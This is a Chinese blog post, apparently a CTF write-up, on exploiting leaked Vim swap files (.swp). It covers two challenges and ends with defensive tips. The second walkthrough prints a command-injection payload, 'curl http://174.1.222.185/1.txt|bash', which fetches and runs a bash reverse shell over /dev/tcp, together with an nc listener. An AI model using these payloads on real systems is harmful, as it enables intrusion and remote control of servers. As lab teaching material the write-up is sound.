SWP文件泄露利用

admin 2024年2月17日19:21:15评论5 views字数 1887阅读6分17秒阅读模式

漏洞简介

SWP文件泄露漏洞是指在使用Vim编辑器编辑一个文件时,Vim会在同一目录下创建一个以".swp"结尾的临时文件来保存编辑过程中的变化,如果在编辑过程中Vim进程被意外终止或者用户没有正确地退出Vim,那么这个临时文件可能会被留下来,如果攻击者能够访问这个临时文件就可以获得原始文件的敏感信息,从而导致信息泄露,需要注意的是不同的操作失败次数将会导致产生不同后缀的交互文件,例如:index.php第一次产生的交换文件名为.index.php.swp,再次意外退出后将会产生名为.index.php.swo的交换文件,第三次产生的交换文件则为.index.php.swn

漏洞利用1

下面以CTFHUB他的vim信息泄露题目为例介绍swap文件泄露的检测与利用

Step 1:访问题目地址

http://challenge-55693d7731622bad.sandbox.ctfhub.com:10800/

SWP文件泄露利用

Step 2:访问下面的链接获取到备份文件

curl http://challenge-55693d7731622bad.sandbox.ctfhub.com:10800/.index.php.swp

SWP文件泄露利用

Step 3:获取到flag———ctfhub{4a0514024e956a8c013de99a}

SWP文件泄露利用

附加:从上面我们查看源代码是会看到出现乱码,如果我们想要恢复源文件,我们可以在linux下执行一下命令来实现

vim -r index.php.swp

SWP文件泄露利用

获取到源码文件以及文件中的flag信息:

SWP文件泄露利用

漏洞利用2

下面以[BJDCTF 2nd]duangShell为例进行介绍,首先访问题目地址后会发现如下界面:

SWP文件泄露利用

从界面的提示中我们很容易联想到的就是swp文件泄露,之后我们在url中加上/index.php.swp,发现什么也没有发生,原来vim临时文件命名的格式为.index.php.swp,于是尝试/.index.php.swp得到swp文件,我们把该swp文件放到自己的虚拟机上然后使用vim -r index.php.swp命令恢复备份文件,得到网站源码:

vim -r .index.php.swp

SWP文件泄露利用

从上面可以看到这里要POST一个girl_friend,这个girl_friend被preg_match过滤了,但是没有过滤nc命令与curl,符合条件的girl_friend会被exec()函数执行,但是我们知道exec()函数是无回显的所以只能用反弹shell的方法了,由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务

SWP文件泄露利用

我们用xshell连上这个靶机并用ifconfig命令查看靶机的IP

SWP文件泄露利用

SWP文件泄露利用

在我们靶机的/var/www/html新建一个能反弹shell的命令文件(1.txt),里面写入命令:bash -i >& /dev/tcp/ip/port 0>&1,IP是内网靶机的IP,port可以随意指定

SWP文件泄露利用

设置nc连接监听题目机的连接

SWP文件泄露利用

此时我们要让题目的服务器连接到我们的靶机上并反弹题目机的shell,我们在hackbar里面girl_friend=curl http://174.1.222.185/1.txt|bash

SWP文件泄露利用

靶机连上了并反弹了shell

SWP文件泄露利用

直接find查找flag 

find / -name flag

SWP文件泄露利用

得到flag:

SWP文件泄露利用

防御措施

以下是一些针对SWP文件泄露的防御措施:

  • 实施安全措施:可以实施安全措施,例如防火墙、入侵检测和漏洞扫描等,以捕获并阻止黑客攻击

  • 清理SWP文件:SWP文件应该定期清理,避免过多的SWP文件占用磁盘空间。可以使用定期清理工具或脚本来定期清理SWP文件

  • 防止文件泄露:SWP文件应该被保护,避免被公开访问和下载。可以使用文件权限和访问控制列表(ACL)等工具,以限制SWP文件的访问权限

  • 配置编辑器:大多数编辑器都可以配置以避免生成SWP文件。例如,可以使用编辑器的自动保存功能,在编辑器崩溃或意外关闭时自动保存文件,避免SWP文件的生成和泄露

  • 用户安全意识培训:最重要的是,用户应该被教育和提醒,避免意外泄露SWP文件。用户应该知道如何正确地关闭编辑器,并且应该避免在不安全的环境中使用编辑器,例如公共计算机或未加密的无线网络

文末小结

SWP文件泄露是一个常见的安全问题,可能导致数据泄露和安全风险。为了防止SWP文件泄露,编辑器应该被正确地配置,SWP文件应该被保护和定期清理,实施安全措施并教育用户避免意外泄露SWP文件

原文始发于微信公众号(七芒星实验室):SWP文件泄露利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月17日19:21:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SWP文件泄露利用https://cn-sec.com/archives/2145099.html

发表评论

匿名网友 填写信息